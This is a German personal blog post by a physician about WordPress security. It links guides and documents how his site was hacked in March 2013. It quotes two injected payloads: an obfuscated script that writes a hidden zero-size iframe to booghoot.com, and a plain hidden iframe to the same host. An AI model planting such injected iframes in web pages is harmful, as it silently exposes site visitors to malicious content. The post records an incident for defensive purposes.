WordPress Security

nachdem mir Wladimir Putin meine  Homepage mehrmals gehacked und einen Exploit injiziert hat, bin ich etwas vorsichtiger und sammle hier für mich div. Mails und Beiträge zurm Thema wordpress Security

5 sicherheits-anleitungen für WP – esecurityplanet

Smashing-Magazine – Langer Artikel über WP-Security 2012

Woothemes got hacked

Dr. Web – secure WP — hab ich alles durchgezogen

KentWasDe – Anleitung über htaccess konfig von WP

Einige Tools – wie Antivirus usw von Serje – Playground.de

 

was mir zugestossen ist
 

13.3.13 und 14.3.13 wurde jeweils meine Seite gehackt

 

bekam folgende Injections in mein Header / Footer file

gestern gehackte Website

‚<script type=“text/javascript“>
<!–
document.write(unescape(‚%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%6F%6F%67%68%6F%6F%74%2E%63%6F%6D%2F%74%72%61%66%66%2F%67%6F%2E%70%68%70%3F%73%69%64%3D%31%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A‘));

//–>‘

heute trotz neu-installation des gesamten servers usw wieder Link auf Putinland

<iframe src=“http://booghoot.com/?all“ width=“0″ height=“0″ frameborder=“0″></iframe>

 

Lösung – mal schaun ob es reicht

Hier hab ich es dokumentiert:  http://mysitemyway.com/support/topic/dejavu-injected-exploit-script-to-booghootcom

eventuell über das Plugin EASYAZON ??

 

(Visited 38 times, 1 visits today)
Dr.med. Helmut B Retzek
Dr.med. Helmut B Retzek
Arzt für Allgemeinmedizin, multiple präventivmedizinische, schulmedizinische und komplementäre ZusatzausbildungenWissenschaftliche Arbeit und Forschungs-BeiträgeZahlreiche Artikel und VorträgeUmfangreiche Recherchen in der aktuellen medizinischen Forschung zum Zweck der Selbst-Weiterbildung und als Gedächtnis-Stütze.

 Mässige Legasthenie, daher Rechtschreib- und Beistrichfehler, bitte nicht kommentieren, wer es nicht aushält bitte einfach nicht lesen

- Dr. Retzek's Youtube - Kanal mit Testimonials usw.
- neue Einträge abonnieren --> im Footer der Seite


die Oberösterreichische Ärztekammer moniert weite Teile diese Website als "aufdringlich, marktschreierisch und beim Laien den Eindruck medizinischer Exklusivität erweckend".
Dies ist keinesfalls beabsichtigt, die Website ist ein absichtsloses Weiterbildungsmedium von Dr. Retzek, der seine wissenschaftlichen Pubmed-Recherchen mit Kollegen unentgeltlich teilt. Dass diese Wissenschaftsrecherchen "das Standesansehen der Ärzte" verletzen könnte, war Dr. Retzek nicht bewusst, er bedauert dies zutiefst und entschuldigt sich bei den betroffenen Kollegen.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.